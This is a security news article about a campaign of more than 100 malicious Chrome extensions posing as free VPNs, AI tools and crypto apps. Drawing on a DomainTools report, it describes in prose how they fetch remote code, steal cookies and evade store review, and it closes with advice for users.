Over the past year, an unidentified cybercriminal has created more than 100 fake Chrome extensions with dual functions—tracking users and stealing access tokens. These extensions evade Google’s security by remotely injecting malicious scripts after installation.

According to a new report from DomainTools, this is part of a large, ongoing campaign that tricks users into downloading supposedly “free” VPNs, AI tools, crypto apps, SEO utilities, and other Chrome extensions.

Figure 1. 100+ Malicious Chrome Extensions Found: AI, VPN & Crypto Scams

As of now, many of the identified malicious extensions remain available on the Chrome Web Store. Figure 1 shows 100+ Malicious Chrome Extensions Found: AI, VPN & Crypto Scams.

According to the report, these extensions often have dual functionality—they perform as expected on the surface but secretly connect to malicious servers to transmit user data, receive commands, and run arbitrary code.

Examples of these deceptive extensions include Deepseek AI, DeBank, Manus AI, Eart VPN, Eelephant, Forti VPN, and SiteStats.

In this campaign, the attacker begins by setting up fake websites that mimic legitimate services, tools, or assistants. These lure sites then redirect users to the Chrome Web Store to install the corresponding malicious extension.

The cybercriminal has also built a network of API servers to manage the extensions—issuing commands, collecting data, and maintaining control. All of the identified servers use a .top top-level domain.

DomainTools researchers warn that the malicious extensions can execute arbitrary code from attacker-controlled servers on any site a user visits. This enables a range of threats, including credential theft, session hijacking, ad injection, malicious redirects, traffic manipulation, phishing via DOM manipulation, and attempts to steal browser cookies—potentially leading to full account compromises.

Separately, Cybernews has highlighted the risk of Chrome extensions demanding excessive permissions. Just over a month ago, another 58 malicious extensions targeting users were uncovered.

How the Hacker Evades Google’s Security Measures

Chrome is moving to a new extension platform called Manifest Version 3 (MV3), aimed at improving security and efficiency by disallowing remotely hosted code. However, the malicious extensions identified in the campaign violate this principle by fetching and executing remote code from attacker-controlled servers.

According to researchers, these extensions often function as advertised but are granted excessive permissions, enabling them to run arbitrary code on every site a user visits. Despite differing in name and appearance, they share similar code structures and backend infrastructure.

In one example, a “background.js” script was used to apply “declarativeNetRequest” rules fetched from the attacker's server. This method allows the extension to alter network traffic—such as blocking, redirecting, or modifying headers—after installation, effectively bypassing Google’s review process. This tactic can be exploited for ad injection, malicious redirects, or user tracking.

Researchers uncovered that the background script of the malicious Chrome extensions was sending encrypted system data—such as language, memory, CPU cores, timezone, IP address, and country code—to attacker-controlled servers, while also receiving potentially executable code and rules in return.

The content script, injected into all websites visited by the user, executed arbitrary code retrieved from these servers. One example, the Forti VPN extension, offered limited VPN functionality using a hardcoded third-party API key, but its primary function was to connect to a malicious backend via WebSocket [1]. Once activated, it would steal all browser cookies, compress and encode them in Base64, and send them to the attacker. It could also act as a proxy, routing traffic through hacker-controlled servers.

The extensions had hardcoded API servers in files like background.js and used JSON Web Tokens (JWT) and SHA-256 for authentication. The threat actor behind the campaign used common infrastructure patterns, including the NameSilo registrar, Cloudflare for hosting, and SSL certificates from WE1, along with consistent Facebook Tracker IDs as part of their ecosystem.

Although some of these extensions have been removed from the Chrome Web Store, the delay between discovery and removal continues to put users at risk. Researchers urge users to install extensions only from trusted developers, review permissions carefully, and be cautious of lookalike tools. Antivirus solutions may help detect threats more quickly.

References:

1. https://cybernews.com/security/hundred-chrome-extensions-stealing-user-data/

Cite this article:

Janani R (2025), Over 100 Malicious Chrome Extensions Found: Masquerading as AI Tools, VPNs, and Crypto Apps, AnaTechMaz, pp. 233